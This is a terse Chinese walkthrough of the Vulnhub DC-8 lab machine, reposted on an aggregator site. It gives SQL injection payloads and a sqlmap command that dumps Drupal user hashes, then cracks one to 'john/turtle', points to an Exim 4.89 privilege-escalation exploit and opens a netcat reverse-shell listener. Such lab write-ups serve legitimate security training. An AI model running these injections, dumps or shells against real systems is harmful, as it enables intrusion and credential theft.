DC8: Vulnhub Walkthrough - 走看看

zoukankan html css js c++ java

DC8: Vulnhub Walkthrough

镜像下载链接：

https://www.vulnhub.com/entry/dc-8,367/#download

主机扫描：

http://10.10.202.131/?nid=2%27

http://10.10.202.131/?nid=2%20and%201=2 # false

http://10.10.202.131/?nid=2%20and%201=1 # true

http://10.10.202.131/?nid=-2+union+select++(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))+

╰─ sqlmap -u "http://10.10.202.131/?nid=1" --dbs --batch -D d7db -T users -C name,pass,init --dump

| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | dc8blah@dc8blah.org |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | john@blahsdfsfd.org |

# john --wordlist=/usr/share/wordlists/rockyou.txt druphsh

john/turtle

进行提权操作：

google: exim 4.89 privilege escalation

https://www.exploit-db.com/exploits/46996

nc -lvvp 4444

OVER!

查看全文

相关阅读:
[BZOJ 3282] Tree 【LCT】
[BZOJ 2049] [Sdoi2008] Cave 洞穴勘测【LCT】
[BZOJ 1036] [ZJOI2008] 树的统计Count 【Link Cut Tree】
[HDOJ
Excel+DDT数据驱动实例
 jenkins+SVN配置
 [转]loadrunner：系统的平均并发用户数和并发数峰值如何估算
 loadrunner：Auto Correlate自动定位瓶颈
 loadrunner：判断是否服务器连接池瓶颈
 利用page_source抓取网页中的URL，进行链接测试

原文地址：https://www.cnblogs.com/firebet/p/13537663.html

Copyright © 2011-2022 走看看